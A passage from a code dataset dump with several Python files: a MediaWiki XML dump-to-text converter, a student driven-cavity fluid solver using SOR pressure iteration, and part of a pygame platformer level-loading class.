max_depth=-1,\n num_rounds=10000, min_data_in_leaf=10, boosting='dart')\n },\n \"metrics\": [\"r2_score\", \"mean_squared_error\"],\n \"predict\": {\n \"test\": {\"features\": test_dataframe}\n }\n}\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n model_lists, model_dir = model_training(parameters_linear)\n self.assertEqual(model_lists, [\"0\"])\n # self.assertEqual(model_dir, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"training/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"6546072","text":"#!/usr/bin/env python2\n#\n# usage:\n# $ mwwiki2txt.py -n10 -t 'article%(pageid)05d.txt' jawiki.xml.bz2\n#\nimport re\nimport sys\nfrom gzip import GzipFile\nfrom bz2 import BZ2File\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\nfrom pymwp.mwtokenizer import WikiToken, XMLTagToken, XMLEmptyTagToken\nfrom pymwp.mwparser import WikiTextParser\nfrom pymwp.mwparser import WikiTree, WikiXMLTree, WikiArgTree\nfrom pymwp.mwparser import WikiSpecialTree, WikiCommentTree\nfrom pymwp.mwparser import WikiKeywordTree, WikiLinkTree\nfrom pymwp.mwparser import WikiSpanTree, WikiDivTree\nfrom pymwp.mwparser import WikiTableTree, WikiTableCellTree\nfrom pymwp.mwxmldump import MWXMLDumpFilter\nfrom pymwp.pycdb import CDBReader, CDBMaker\n\n\nSPC = re.compile(r'\\s+')\ndef rmsp(s): return SPC.sub(' ', s)\n\nIGNORED = re.compile(u'^([-a-z]+|Category|Special):')\ndef isignored(name): return IGNORED.match(name)\n\n\n## WikiTextExtractor\n##\nclass WikiTextExtractor(WikiTextParser):\n\n def __init__(self, errfp=sys.stderr, codec='utf-8'):\n WikiTextParser.__init__(self)\n self.errfp = errfp\n self.codec = codec\n return\n\n def error(self, s):\n self.errfp.write(s)\n return\n\n def invalid_token(self, pos, token):\n if self.errfp is not None:\n self.error('invalid token(%d): %r\\n' % (pos, token))\n return\n\n def convert(self, fp, tree=None):\n if tree is None:\n self.convert(fp, self.get_root())\n elif tree is WikiToken.PAR:\n fp.write('\\n')\n elif isinstance(tree, XMLEmptyTagToken):\n if tree.name in XMLTagToken.BR_TAG:\n fp.write('\\n')\n elif isinstance(tree, unicode):\n fp.write(rmsp(tree).encode(self.codec, 'ignore'))\n elif isinstance(tree, WikiSpecialTree):\n pass\n elif isinstance(tree, WikiCommentTree):\n pass\n elif isinstance(tree, WikiXMLTree):\n if tree.xml.name in XMLTagToken.NO_TEXT:\n pass\n else:\n for c in tree:\n self.convert(fp, c)\n if tree.xml.name in XMLTagToken.PAR_TAG:\n fp.write('\\n')\n elif isinstance(tree, WikiKeywordTree):\n if tree:\n if isinstance(tree[0], WikiTree):\n name = tree[0].get_text()\n else:\n name = tree[0]\n if isinstance(name, unicode) and not isignored(name):\n self.convert(fp, tree[-1])\n elif isinstance(tree, WikiLinkTree):\n if 2 <= len(tree):\n for c in tree[1:]:\n self.convert(fp, c)\n fp.write(' ')\n elif tree:\n self.convert(fp, tree[0])\n elif isinstance(tree, WikiTableCellTree):\n if tree:\n self.convert(fp, tree[-1])\n fp.write('\\n')\n elif isinstance(tree, WikiTableTree):\n for c in tree:\n if not isinstance(c, WikiArgTree):\n self.convert(fp, c)\n elif isinstance(tree, WikiDivTree):\n for c in tree:\n self.convert(fp, c)\n fp.write('\\n')\n elif isinstance(tree, WikiTree):\n for c in tree:\n self.convert(fp, c)\n return\n\n\n## WikiLinkExtractor\n##\nclass WikiLinkExtractor(WikiTextParser):\n\n def __init__(self, errfp=sys.stderr, codec='utf-8'):\n WikiTextParser.__init__(self)\n self.errfp = errfp\n self.codec = codec\n return\n\n def error(self, s):\n self.errfp.write(s)\n return\n\n def invalid_token(self, pos, token):\n if self.errfp is not None:\n self.error('invalid token(%d): %r\\n' % (pos, token))\n return\n\n def convert(self, fp, tree=None):\n if tree is None:\n self.convert(fp, self.get_root())\n elif isinstance(tree, WikiKeywordTree):\n if tree:\n if isinstance(tree[0], WikiTree):\n name = tree[0].get_text()\n else:\n name = tree[0]\n if isinstance(name, unicode):\n fp.write('keyword\\t'+name.encode(self.codec, 'ignore'))\n if 2 <= len(tree) and not 
isignored(name):\n                    text = tree[-1].get_text()\n                    fp.write('\\t'+text.encode(self.codec, 'ignore'))\n                fp.write('\\n')\n        elif isinstance(tree, WikiLinkTree):\n            if tree:\n                if isinstance(tree[0], WikiTree):\n                    url = tree[0].get_text()\n                else:\n                    url = tree[0]\n                if isinstance(url, unicode):\n                    fp.write('link\\t'+url.encode(self.codec, 'ignore'))\n                    if 2 <= len(tree):\n                        text = tree[-1].get_text()\n                        fp.write('\\t'+text.encode(self.codec, 'ignore'))\n                    fp.write('\\n')\n        elif isinstance(tree, WikiTree):\n            for c in tree:\n                self.convert(fp, c)\n        return\n\n\n## MWDump2Text\n##\nclass MWDump2Text(MWXMLDumpFilter):\n\n    def __init__(self, factory,\n                 outfp=sys.stdout, codec='utf-8', titleline=True,\n                 titlepat=None, revisionlimit=1):\n        MWXMLDumpFilter.__init__(\n            self,\n            titlepat=titlepat, revisionlimit=revisionlimit)\n        self.factory = factory\n        self.codec = codec\n        self.outfp = outfp\n        self.titleline = titleline\n        return\n\n    def open_file(self, pageid, title, revision):\n        print >>sys.stderr, (title,revision)\n        if self.titleline:\n            self.write(title+'\\n')\n        self._textparser = self.factory(self.codec)\n        return self.outfp\n\n    def write_file(self, fp, text):\n        self._textparser.feed_text(text)\n        return\n\n    def close_file(self, fp):\n        self._textparser.close()\n        self._textparser.convert(fp)\n        self.write('\\f\\n')\n        return\n\n\n## MWCDB2Text\n##\nclass MWCDB2Text(object):\n\n    def __init__(self, srcpath, dstpath, factory):\n        self.reader = CDBReader(srcpath)\n        self.writer = CDBMaker(dstpath)\n        self.factory = factory\n        return\n\n    def close(self):\n        self.writer.finish()\n        return\n\n    def convert(self, pageid, revision=0):\n        key = '%d/%d' % (pageid, revision)\n        srcbuf = StringIO(self.reader[key])\n        src = GzipFile(mode='r', fileobj=srcbuf)\n        dstbuf = StringIO()\n        dst = GzipFile(mode='w', fileobj=dstbuf)\n        textparser = self.factory('utf-8')\n        textparser.feed_text(src.read().decode('utf-8'))\n        textparser.close()\n        textparser.convert(dst)\n        src.close()\n        dst.close()\n        self.writer.add(key, dstbuf.getvalue())\n        key = '%d:title' % pageid\n        self.writer.add(key, self.reader[key])\n        return\n\n    def convert_all(self):\n        for key in self.reader:\n            try:\n                i = key.rindex('/')\n                pageid = int(key[:i])\n                revision = int(key[i+1:])\n            except ValueError:\n                continue\n            print >>sys.stderr, (pageid,revision)\n            self.convert(pageid, revision)\n        return\n\n\n# main\ndef main(argv):\n    import getopt\n    def getfp(path, mode='r'):\n        if path == '-' and mode == 'r':\n            return sys.stdin\n        elif path == '-' and mode == 'w':\n            return sys.stdout\n        elif path.endswith('.gz'):\n            return GzipFile(path, mode=mode)\n        elif path.endswith('.bz2'):\n            return BZ2File(path, mode=mode)\n        else:\n            return open(path, mode=mode+'b')\n    def usage():\n        print ('usage: %s [-X xmldump] [-C cdbdump] [-o output] [-c codec] [-T] [-L] '\n               '[-e titlepat] [-r revisionlimit] [file ...]') % argv[0]\n        return 100\n    try:\n        (opts, args) = getopt.getopt(argv[1:], 'X:C:o:c:TLe:r:')\n    except getopt.GetoptError:\n        return usage()\n    xmldump = None\n    cdbdump = None\n    output = None\n    codec = 'utf-8'\n    titlepat = None\n    revisionlimit = 1\n    titleline = False\n    factory = (lambda codec: WikiTextExtractor(codec=codec))\n    for (k, v) in opts:\n        if k == '-X': xmldump = v\n        elif k == '-C': cdbdump = v\n        elif k == '-o': output = v\n        elif k == '-c': codec = v\n        elif k == '-T': titleline = True\n        elif k == '-L': factory = (lambda codec: WikiLinkExtractor(codec=codec))\n        elif k == '-e': titlepat = re.compile(v)\n        elif k == '-r': revisionlimit = int(v)\n    if xmldump is not None:\n        outfp = getfp(output or '-', 'w')\n        parser
= MWDump2Text(\n factory, outfp=outfp,\n codec=codec, titleline=titleline,\n titlepat=titlepat, revisionlimit=revisionlimit)\n fp = getfp(xmldump)\n parser.feed_file(fp)\n fp.close()\n parser.close()\n elif cdbdump is not None:\n if not output: return usage()\n reader = MWCDB2Text(cdbdump, output, factory)\n if args:\n for pageid in args:\n reader.convert(int(pageid))\n else:\n try:\n reader.convert_all()\n finally:\n reader.close()\n else:\n outfp = getfp(output or '-', 'w')\n for path in (args or ['-']):\n print >>sys.stderr, path\n parser = factory(codec)\n fp = getfp(path)\n parser.feed_file(fp)\n fp.close()\n parser.close()\n parser.convert(outfp)\n return\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","sub_path":"tools/mwwiki2txt.py","file_name":"mwwiki2txt.py","file_ext":"py","file_size_in_byte":9723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"130436556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 2 15:32:51 2019\r\n\r\n@author: Benjamin Ihme\r\n\"\"\"\r\n\r\n#a)\r\n\r\nimport numpy as np\r\nfrom math import sqrt\r\nimport os\r\nimport argparse\r\n\r\n#get paths\r\nparser=argparse.ArgumentParser(description=\"Driven-Cavity-Problem\")\r\nparser.add_argument('--input', type=str, required=True, help=\"Input file containing the parameters for the driven cavity problem\")\r\nparser.add_argument('--output', type=str, required=True, help=\"Base name for output files that result from driven cavity problem\")\r\nargs=parser.parse_args()\r\ninputname=args.input\r\noutputname=args.output\r\n\r\n#write all the functions from task a)\r\n\r\n\r\n#reads parameters from file (file has to be in the format from exercise sheet)\r\n#returns imax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI\r\n#which are all integers of floats \r\n#UI,VI,PI are constants with which the matrices are filled\r\ndef read_parameters_from_file(filename):\r\n with open(filename, 'r') as myfile:\r\n imax=int(str(myfile.readline()).partition(\"=\")[2])\r\n jmax=int(str(myfile.readline()).partition(\"=\")[2])\r\n xlength=float(str(myfile.readline()).partition(\"=\")[2])\r\n ylength=float(str(myfile.readline()).partition(\"=\")[2])\r\n delt=float(str(myfile.readline()).partition(\"=\")[2])\r\n t_end=float(str(myfile.readline()).partition(\"=\")[2])\r\n tau=float(str(myfile.readline()).partition(\"=\")[2])\r\n del_vec=float(str(myfile.readline()).partition(\"=\")[2])\r\n eps=float(str(myfile.readline()).partition(\"=\")[2])\r\n omg=float(str(myfile.readline()).partition(\"=\")[2])\r\n alpha=float(str(myfile.readline()).partition(\"=\")[2])\r\n itermax=int(str(myfile.readline()).partition(\"=\")[2])\r\n GX=float(str(myfile.readline()).partition(\"=\")[2])\r\n GY=float(str(myfile.readline()).partition(\"=\")[2])\r\n Re=int(str(myfile.readline()).partition(\"=\")[2])\r\n UI=float(str(myfile.readline()).partition(\"=\")[2])\r\n VI=float(str(myfile.readline()).partition(\"=\")[2])\r\n PI=float(str(myfile.readline()).partition(\"=\")[2])\r\n return imax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI\r\n\r\n\r\n#initializes U,V and P according to UI,VI,PI \r\ndef initialize_fields_UVP(imax,jmax, UI, VI, PI):\r\n U=np.zeros([imax+2,jmax+2],float)\r\n V=np.zeros([imax+2,jmax+2],float)\r\n P=np.zeros([imax+2,jmax+2],float)\r\n for i in range(1,imax+1):\r\n for j in range(1,jmax+1):\r\n U[i][j]=UI\r\n V[i][j]=VI\r\n P[i][j]=PI\r\n return U,V,P\r\n\r\n\r\n#applies boundary conditions (17, 18) to U and V\r\ndef apply_boundary_conditions_UV_2(imax, jmax, U, V):\r\n for j in range(1,jmax+1):\r\n U[0][j]=0\r\n U[imax][j]=0\r\n V[0][j]=-V[1][j]\r\n V[imax+1][j]=-V[imax][j]\r\n for i in range(1,imax+1):\r\n U[i][0]=-U[i][1]\r\n U[i][jmax+1]=-U[i][jmax]\r\n V[i][0]=0\r\n V[i][jmax]=0\r\n \r\n#applies boundary conditions V and to U according to task b)\r\ndef apply_boundary_conditions_UV(imax, jmax, U, V):\r\n for j in range(1,jmax+1):\r\n U[0][j]=0\r\n U[imax][j]=0\r\n V[0][j]=-V[1][j]\r\n V[imax+1][j]=-V[imax][j]\r\n for i in range(1,imax+1):\r\n U[i][0]=-U[i][1]\r\n U[i][jmax+1]=2-U[i][jmax]\r\n V[i][0]=0\r\n V[i][jmax]=0\r\n \r\ndef calculate_delx_dely(imax,jmax,xlength,ylength):\r\n return xlength/imax, ylength/jmax\r\n\r\ndef calculate_delt(tau,Re,delx,dely,U,V, delt):\r\n if(tau<0):\r\n return delt\r\n umax=float(max(np.amax(U), abs(np.amin(U))))\r\n vmax=float(max(np.amax(U), 
abs(np.amin(U))))\r\n    vmax=float(max(np.amax(V), abs(np.amin(V)))) #vmax is the largest absolute value of V\r\n    if umax==0:\r\n        if vmax==0:\r\n            return tau*(Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely))))\r\n        else:\r\n            return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), dely/vmax)\r\n    else:\r\n        if vmax==0:\r\n            return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), delx/umax)\r\n        else:\r\n            return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), delx/umax, dely/vmax)\r\n\r\n#calculates F and G from U and V and applies boundary conditions\r\n#F and G have to exist already\r\n#has no return value\r\ndef calculate_F_G(imax, jmax, delt, delx, dely, alpha, GX, GY, U, V, F, G):\r\n    #apply boundary conditions first\r\n    for j in range(1, jmax+1):\r\n        F[0][j]=U[0][j]\r\n        F[imax][j]=U[imax][j]\r\n    for i in range(1, imax+1):\r\n        G[i][0]=V[i][0]\r\n        G[i][jmax]=V[i][jmax]\r\n    #now the rest\r\n    for i in range(1,imax):\r\n        for j in range(1, jmax+1):\r\n            ddudxx=(U[i+1][j]-2*U[i][j]+U[i-1][j])/(delx*delx)\r\n            ddudyy=(U[i][j+1]-2*U[i][j]+U[i][j-1])/(dely*dely)\r\n            duudx=(1/delx)*((((U[i][j]+U[i+1][j])/2)**2)-(((U[i-1][j]+U[i][j])/2)**2))+alpha*(1/(4*delx))*((abs(U[i][j]+U[i+1][j])*(U[i][j]-U[i+1][j]))-(abs(U[i-1][j]+U[i][j])*(U[i-1][j]-U[i][j])))\r\n            duvdy=(1/(dely*4))*((V[i][j]+V[i+1][j])*(U[i][j]+U[i][j+1])-(V[i][j-1]+V[i+1][j-1])*(U[i][j-1]+U[i][j]))+alpha*(1/(dely*4))*((abs(V[i][j]+V[i+1][j])*(U[i][j]-U[i][j+1]))-(abs(V[i][j-1]+V[i+1][j-1])*(U[i][j-1]-U[i][j])))\r\n            F[i][j]=U[i][j]+delt*(((1/Re)*(ddudxx+ddudyy))-duudx-duvdy+GX)\r\n    for i in range(1, imax+1):\r\n        for j in range(1, jmax):\r\n            duvdx=(1/(delx*4))*((U[i][j]+U[i][j+1])*(V[i][j]+V[i+1][j])-(U[i-1][j]+U[i-1][j+1])*(V[i-1][j]+V[i][j]))+alpha*(1/(delx*4))*((abs(U[i][j]+U[i][j+1])*(V[i][j]-V[i+1][j]))-(abs(U[i-1][j]+U[i-1][j+1])*(V[i-1][j]-V[i][j])))\r\n            dvvdy=(1/dely)*((((V[i][j]+V[i][j+1])/2)**2)-(((V[i][j-1]+V[i][j])/2)**2))+alpha*(1/(4*dely))*((abs(V[i][j]+V[i][j+1])*(V[i][j]-V[i][j+1]))-(abs(V[i][j-1]+V[i][j])*(V[i][j-1]-V[i][j])))\r\n            ddvdxx=(V[i+1][j]-2*V[i][j]+V[i-1][j])/(delx*delx)\r\n            ddvdyy=(V[i][j+1]-2*V[i][j]+V[i][j-1])/(dely*dely)\r\n            G[i][j]=V[i][j]+delt*(((1/Re)*(ddvdxx+ddvdyy))-duvdx-dvvdy+GY)\r\n\r\n\r\n#calculates the right hand side of formula (14)\r\n#RHS matrix has to exist already\r\n#has no return value\r\ndef calculate_RHS(imax, jmax, delt, delx, dely, F, G, RHS):\r\n    for i in range(1, imax+1):\r\n        for j in range(1, jmax+1):\r\n            RHS[i][j]=(1/delt)*(((F[i][j]-F[i-1][j])/delx)+((G[i][j]-G[i][j-1])/dely))\r\n\r\n#applies boundary conditions (19) to P\r\ndef apply_boundary_conditions_Pressure(imax, jmax, P):\r\n    for j in range(1, jmax+1):\r\n        P[0][j]=P[1][j]\r\n        P[imax+1][j]=P[imax][j]\r\n    for i in range(1, imax+1):\r\n        P[i][0]=P[i][1]\r\n        P[i][jmax+1]=P[i][jmax]\r\n\r\ndef make_B_to_a_copy_of_A(imax, jmax, B, A):\r\n    for i in range(0, imax+2):\r\n        for j in range(0, jmax+2):\r\n            B[i][j]=A[i][j]\r\n\r\n#calculates P using boundary conditions (19) and SOR (15)\r\n#P has to exist already\r\n#returns number of iterations and norm of residuum\r\ndef calculate_Pressure_with_SOR(imax, jmax, itermax, delx, dely, eps, omg, RHS, P):\r\n    apply_boundary_conditions_Pressure(imax, jmax, P)\r\n    #make second matrix to store the old values\r\n    P_old=np.zeros([imax+2, jmax+2], float)\r\n    make_B_to_a_copy_of_A(imax, jmax, P_old, P)\r\n\r\n    it=0\r\n    res_squared=eps*eps+1\r\n    while it<itermax and res_squared>eps*eps:\r\n        apply_boundary_conditions_Pressure(imax, jmax, P)\r\n        apply_boundary_conditions_Pressure(imax, jmax, P_old)\r\n        #do 1 SOR cycle\r\n        for i in range(1, imax+1):\r\n            for j in range(1, jmax+1):\r\n                P[i][j]=(1-omg)*P_old[i][j]+(omg/(2*((1/delx**2)+(1/dely**2))))*(((P_old[i+1][j]+P[i-1][j])/delx**2)+((P_old[i][j+1]+P[i][j-1])/dely**2)-RHS[i][j])\r\n        make_B_to_a_copy_of_A(imax, jmax, P_old, P)\r\n        #calculate residuum (16)\r\n        res_squared=sum( [sum( [(((P[i+1][j]-2*P[i][j]+P[i-1][j])/delx**2)+((P[i][j+1]-2*P[i][j]+P[i][j-1])/dely**2)-RHS[i][j])**2 for j in range(1, jmax+1)] ) for i in range(1, imax+1)] )/(imax*jmax)\r\n        it+=1\r\n# =============================================================================\r\n#     if(res_squared>eps*eps):\r\n#         print(\"SOR didn't yield a result that was close enough\")\r\n# =============================================================================\r\n    return it, sqrt(res_squared)\r\n\r\n\r\n#calculate velocities U and V according to (10) and (11)\r\ndef calculate_U_and_V(imax, jmax, delt, delx, dely, F, G, P, U, V):\r\n    for i in range(1, imax):\r\n        for j in range(1, jmax+1):\r\n            U[i][j]=F[i][j]-(delt/delx)*(P[i+1][j]-P[i][j])\r\n    for i in range(1, imax+1):\r\n        for j in range(1, jmax):\r\n            V[i][j]=G[i][j]-(delt/dely)*(P[i][j+1]-P[i][j])\r\n\r\ndef write_output_into_file(filename, xlength, ylength, imax, jmax, U, V, P, U2, V2):\r\n    #calculate U2 and V2 as the values of U and V in the middle of cells\r\n    for i in range(1, imax+1):\r\n        for j in range(1, jmax+1):\r\n            U2[i][j]=(U[i][j-1]+U[i][j])/2\r\n            V2[i][j]=(V[i][j]+V[i+1][j])/2\r\n    #write data into file\r\n    with open(filename, 'w') as myfile:\r\n        myfile.write(str(xlength))\r\n        myfile.write(\"\\n\")\r\n        myfile.write(str(ylength))\r\n        myfile.write(\"\\n\")\r\n        myfile.write(str(imax))\r\n        myfile.write(\"\\n\")\r\n        myfile.write(str(jmax))\r\n        myfile.write(\"\\n\")\r\n        for i in range(1,imax+1):\r\n            for j in range(1, jmax+1):\r\n                myfile.write(str(U2[i][j]))\r\n                myfile.write(\" \")\r\n        myfile.write(\"\\n\")\r\n        for i in range(1,imax+1):\r\n            for j in range(1, jmax+1):\r\n                myfile.write(str(V2[i][j]))\r\n                myfile.write(\" \")\r\n        myfile.write(\"\\n\")\r\n        for i in range(1,imax+1):\r\n            for j in range(1, jmax+1):\r\n                myfile.write(str(P[i][j]))\r\n                myfile.write(\" \")\r\n        myfile.write(\"\\n\")\r\n\r\n\r\n#b)\r\n\r\n#ALGORITHM:\r\n\r\n#first create new directory to store resulting files in\r\n#delete its contents after use, or ambiguities might occur\r\n\r\n\r\nif not os.path.exists(\"Files\"):\r\n    os.makedirs(\"Files\")\r\n\r\nimax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI=read_parameters_from_file(inputname)\r\ndel_vec2=del_vec\r\n\r\nt=0\r\ndelx,dely=calculate_delx_dely(imax,jmax,xlength,ylength)\r\nU,V,P=initialize_fields_UVP(imax,jmax, UI, VI, PI)\r\n#matrices that will be used in the algorithm\r\nF=np.zeros([imax+2, jmax+2], float)\r\nG=np.zeros([imax+2, jmax+2], float)\r\nRHS=np.zeros([imax+2, jmax+2], float)\r\nU2=np.zeros([imax+2, jmax+2], float)\r\nV2=np.zeros([imax+2, jmax+2], float)\r\nnumber_of_files=0\r\n#main time loop of the algorithm\r\nwhile t<t_end:\r\n    delt=calculate_delt(tau,Re,delx,dely,U,V,delt)\r\n    apply_boundary_conditions_UV(imax, jmax, U, V)\r\n    calculate_F_G(imax, jmax, delt, delx, dely, alpha, GX, GY, U, V, F, G)\r\n    calculate_RHS(imax, jmax, delt, delx, dely, F, G, RHS)\r\n    it, res=calculate_Pressure_with_SOR(imax, jmax, itermax, delx, dely, eps, omg, RHS, P)\r\n    calculate_U_and_V(imax, jmax, delt, delx, dely, F, G, P, U, V)\r\n    if(t>del_vec):\r\n        number_of_files+=1\r\n        write_output_into_file(\"Files/\"+outputname+\"_{0:03}\".format(number_of_files), xlength, ylength, imax, jmax, U, V, P, U2, V2)\r\n        del_vec=t+del_vec2\r\n    t+=delt\r\nnumber_of_files+=1\r\nwrite_output_into_file(\"Files/\"+outputname+\"_{0:03}\".format(number_of_files), xlength, ylength, imax, jmax, U, V, P, U2, V2)\r\n\r\n","sub_path":"Exercise Sheet 5/driven_cavity.py","file_name":"driven_cavity.py","file_ext":"py","file_size_in_byte":11380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"400012789","text":"# -*- encoding: utf-8 -*-\n\nimport math\nimport sys\n\nimport pygame\n\nfrom characters.Enemy import *\nfrom characters.Item import *\nfrom stage.regular.Background import *\nfrom stage.regular.HUD import HUD\nfrom stage.regular.Platform import Platform\nfrom stage.regular.Scene import Scene\n\n\ndef str_to_class(str):\n    return getattr(sys.modules[__name__], str)\n\n\nclass Stage(Scene):\n    def __init__(self, manager, data, player, platformGroup, spriteGroup, enemyGroup, itemGroup, deadBodiesGroup):\n        Scene.__init__(self, manager)\n\n        self.MAP_UNIT_WIDTH = 55\n        self.MAP_UNIT_HEIGHT = 55\n        # Mapping of letters to game objects\n        self.platform_letter = [\"0\", \"1\", \"2\"]\n        self.enemy_letter = [\"a\", \"b\", \"m\", \"n\", \"s\"]\n        self.fire_letter = \"f\"\n        self.heart_letter = \"h\"\n        self.door_letter = \"d\"\n        self.wardrove_letter = \"w\"\n        self.chandelier_letter = \"c\"\n        self.coin_letter = \"$\"\n        self.health_potion_letter = \"p\"\n        self.manager = manager\n        self.data = data\n        self.screen = self.manager.getScreen()\n        self.player = player\n        self.playerStartPosition = self.player.getGlobalPosition()\n        self.playerDisplacement = list((0, 0))\n\n        # Initialize groups\n        self.spriteGroup = spriteGroup\n        self.platformGroup = platformGroup\n        self.enemyGroup = enemyGroup\n        self.itemGroup = itemGroup\n        self.deadBodiesGroup = deadBodiesGroup\n\n        self.initialize_lifebar_finalenemy()\n        self.setup()\n\n    def setup(self):\n\n        # load the map\n        self.map = self.data[\"map\"]\n        self.levelDimensions = (1024, (len(\n            self.map) + 10) * self.MAP_UNIT_HEIGHT)  # ((int(self.data[\"dimensions\"][0]), int(self.data[\"dimensions\"][1])))\n        # Generate the background layer\n        self.background = BackGround(self.manager, self.data[\"bglayers\"], self.player, self.levelDimensions)\n        self.platformfiles = self.data[\"platform_files\"]\n        # Create the level from the text file\n        self.create_level()\n        # Create the HUD\n        self.HUD = HUD(self.manager, self.player)\n\n    def create_level(self):\n        # Variables\n        column_number = 0\n        row_number = 0\n\n        for line in self.map:\n            platform_size = 0\n            prev_letter = \" \"\n            for letter in line:\n                # If the letter maps to a platform, grow the platform to be created by one position\n                if letter in self.platform_letter:\n                    platform_size = platform_size + 1\n\n                # Create enemies\n                if letter in self.enemy_letter:\n                    if letter == \"a\":\n                        tmp = Asmodeo(self.manager, self.manager.getDataRetriever())\n                    elif letter == \"b\":\n                        tmp = Belcebu(self.manager, self.manager.getDataRetriever())\n                    elif letter == \"m\":\n                        tmp = Mammon(self.manager, self.manager.getDataRetriever())\n                    elif letter == \"n\":\n                        tmp = Dante(self.manager, self.manager.getDataRetriever())\n                    elif letter == \"s\":\n                        tmp = Satan(self.manager, self.manager.getDataRetriever())\n                    tmp.enemyGroup = self.enemyGroup\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.enemyGroup.add(tmp)\n\n                # Create Items\n                if letter == self.fire_letter:\n                    tmp = Fire(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.heart_letter:\n                    tmp = Heart(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.door_letter:\n                    tmp = Door(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.chandelier_letter:\n                    tmp = Chandelier(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.wardrove_letter:\n                    tmp = Wardrove(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.health_potion_letter:\n                    tmp = HealthPotion(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                if letter == self.coin_letter:\n                    tmp = Coin(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n                    tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n                    self.itemGroup.add(tmp)\n\n                # Create platforms\n                if not letter in self.platform_letter and prev_letter in self.platform_letter:\n                    platform = Platform(\n                        self.manager,\n                        (column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT),\n                        self.platformfiles[int(prev_letter)],\n                        platform_size)\n                    self.platformGroup.add(platform)\n                    platform_size = 0\n\n                # Increment the column counter\n                column_number = column_number + 1\n\n                # Remember the current letter in prev_letter\n                prev_letter = letter\n\n            # Create last platform\n            if prev_letter in self.platform_letter:\n                platform = Platform(\n                    self.manager,\n                    (column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT),\n                    self.platformfiles[int(prev_letter)],\n                    platform_size)\n                self.platformGroup.add(platform)\n\n            # Increment the row counter\n            row_number = row_number + 1\n            column_number = 0\n        # print \"posicion bottom-->\",(row_number-1)*55\n\n    def update(self, clock):\n        self.manager.getScreen().fill(int(self.data[\"bgColor\"], 16))  # necessary on Windows, not on Mac\n        # Compute the distance between the player's initial position and the current one.\n        # This value is passed to Background and Platform so they can perform the scrolling.\n        # The scroll is only updated while the player is jumping or falling.\n        if self.player.getDoUpdateScroll() & self.getDoUpdateScroll():\n            self.playerDisplacement = (\n                0,  # int(math.ceil(self.playerStartPosition[0]-self.player.getPosition()[0])),\n                int(math.ceil(self.playerStartPosition[1] - self.player.getGlobalPosition()[1]))\n            )\n        # print \"player \", self.player.getGlobalPosition()[1], self.player.getLocalPosition()[1]\n        self.background.update(clock, self.playerDisplacement)\n\n        for p in self.platformGroup:\n            p.update(clock, self.playerDisplacement)\n\n        for i in self.itemGroup:\n            i.update(clock, self.playerDisplacement)\n\n        self.player.update(clock, self.playerDisplacement, self.platformGroup, self.enemyGroup, self.itemGroup)\n        self.enemyGroup.update(clock, self.player, self.playerDisplacement)\n        self.deadBodiesGroup.update(clock, self.player, self.playerDisplacement)\n        # self.player.enemy_coll(self.enemyGroup, self.player)\n        self.HUD.update()\n\n    def draw(self):\n        self.background.draw()\n        self.platformGroup.draw(self.manager.getScreen())\n        self.itemGroup.draw(self.manager.getScreen())\n        self.enemyGroup.draw(self.manager.getScreen())\n        self.deadBodiesGroup.draw(self.manager.getScreen())\n        self.spriteGroup.draw(self.manager.getScreen())\n        self.HUD.draw()\n        self.draw_lifebar_finalenemy()\n        # Uncomment this line to show the collision rects of every game element\n        # self.draw_collision_rects()\n\n    def draw_collision_rects(self):\n        # Platform rects\n        for item in self.itemGroup:\n            self.draw_transparent_rect(item.getRect(), (255, 255, 255, 50))\n\n        # Enemy rects\n        for enemy in self.enemyGroup:\n            self.draw_transparent_rect(enemy.getRect(), 